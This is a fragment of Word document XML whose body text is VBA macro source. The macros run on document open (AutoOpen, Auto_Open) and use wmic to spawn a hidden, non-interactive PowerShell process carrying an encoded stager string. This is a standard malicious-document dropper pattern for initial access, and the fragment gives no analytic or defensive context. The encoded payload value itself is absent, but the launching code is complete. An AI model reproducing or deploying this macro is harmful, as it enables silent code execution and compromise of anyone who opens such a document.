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F6C2" w14:textId="77777777" w:rsidR="007721E7" w:rsidRDefault="007721E7" w:rsidP="007721E7">
      <w:r>
        <w:t>Private Sub run()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762370C0" w14:textId="77777777" w:rsidR="007721E7" w:rsidRDefault="007721E7" w:rsidP="007721E7">
      <w:r>
        <w:t xml:space="preserve">  Dim </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> As String</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A974C1" w14:textId="77777777" w:rsidR="007721E7" w:rsidRDefault="007721E7" w:rsidP="007721E7">
      <w:r>
        <w:t xml:space="preserve">  Dim stager1 As String</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F0E575" w14:textId="77777777" w:rsidR="007721E7" w:rsidRDefault="007721E7" w:rsidP="007721E7">
      <w:r>
        <w:t xml:space="preserve">  stager1 = "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"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9F8F12" w14:textId="77777777" w:rsidR="007721E7" w:rsidRDefault="007721E7" w:rsidP="007721E7">
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = "wmic process call create 'powershell.exe -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nOpR</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nonI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-win hidden -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eNc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> " &amp; stager1 &amp; "'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07409004" w14:textId="77777777" w:rsidR="007721E7" w:rsidRDefault="007721E7" w:rsidP="007721E7">
      <w:r>
        <w:t xml:space="preserve">  Set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sh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14:paraId="52E1A133" w14:textId="77777777" w:rsidR="007721E7" w:rsidRDefault="007721E7" w:rsidP="007721E7">
      <w:r>
        <w:t xml:space="preserve">  res = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sh.run</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, 0, True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F200C3" w14:textId="77777777" w:rsidR="007721E7" w:rsidRDefault="007721E7" w:rsidP="007721E7">
      <w:r>
        <w:t>End Sub</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43140D82" w14:textId="77777777" w:rsidR="007721E7" w:rsidRDefault="007721E7" w:rsidP="007721E7">
      <w:r>
        <w:t>Sub AutoOpen()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735717CE" w14:textId="77777777" w:rsidR="007721E7" w:rsidRDefault="007721E7" w:rsidP="007721E7">
      <w:r>
        <w:t xml:space="preserve">  run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F392308" w14:textId="77777777" w:rsidR="007721E7" w:rsidRDefault="007721E7" w:rsidP="007721E7">
      <w:r>
        <w:t>End Sub</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E01EB01" w14:textId="77777777" w:rsidR="007721E7" w:rsidRDefault="007721E7" w:rsidP="007721E7">
      <w:r>
        <w:t xml:space="preserve">'Sub </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AutoExec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA1845E" w14:textId="77777777" w:rsidR="007721E7" w:rsidRDefault="007721E7" w:rsidP="007721E7">
      <w:r>
        <w:t>'  run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115FDF7F" w14:textId="77777777" w:rsidR="007721E7" w:rsidRDefault="007721E7" w:rsidP="007721E7">
      <w:r>
        <w:t>'End Sub</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260DBA58" w14:textId="77777777" w:rsidR="007721E7" w:rsidRDefault="007721E7" w:rsidP="007721E7">
      <w:r>
        <w:t xml:space="preserve">Sub </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Auto_Open</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B28613" w14:textId="77777777" w:rsidR="007721E7" w:rsidRDefault="007721E7" w:rsidP="007721E7">
      <w:r>
        <w:t xml:space="preserve">  run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CE8B61" w14:textId="77777777" w:rsidR="007721E7" w:rsidRDefault="007721E7" w:rsidP="007721E7">
      <w:r>
        <w:t>End Sub</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC5C11D" w14:textId="77777777" w:rsidR="007721E7" w:rsidRDefault="007721E7" w:rsidP="007721E7">
      <w:r>
        <w:t xml:space="preserve">'Sub </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Auto_Exec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198E23D8" w14:textId="77777777" w:rsidR="007721E7" w:rsidRDefault="007721E7" w:rsidP="007721E7">
      <w:r>
        <w:t>'  run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23040EEF" w14:textId="7D01D2AF" w:rsidR="004824FF" w:rsidRPr="007721E7" w:rsidRDefault="007721E7" w:rsidP="007721E7">
      <w:r>
        <w:t>'End Sub</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="004824FF" w:rsidRPr="0077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09"/>
    <w:rsid w:val="003547D1"/>
    <w:rsid w:val="00525B9D"/>
    <w:rsid w:val="006B5E46"/>
    <w:rsid w:val="006F4209"/>
    <w:rsid w:val="00703BBD"/>
    <w:rsid w:val="007721E7"/>
    <w:rsid w:val="009734AE"/>
    <w:rsid w:val="00A93DA0"/>
    <w:rsid w:val="00B2552B"/>
    <w:rsid w:val="00F3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265"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{DAEDA87F-6BA8-4D94-A474-C154BFB0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Kowpak</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Michael Kowpak</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-05-21T19:03:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-05-21T21:43:00Z</dcterms:modified>
</cp:coreProperties>
</file>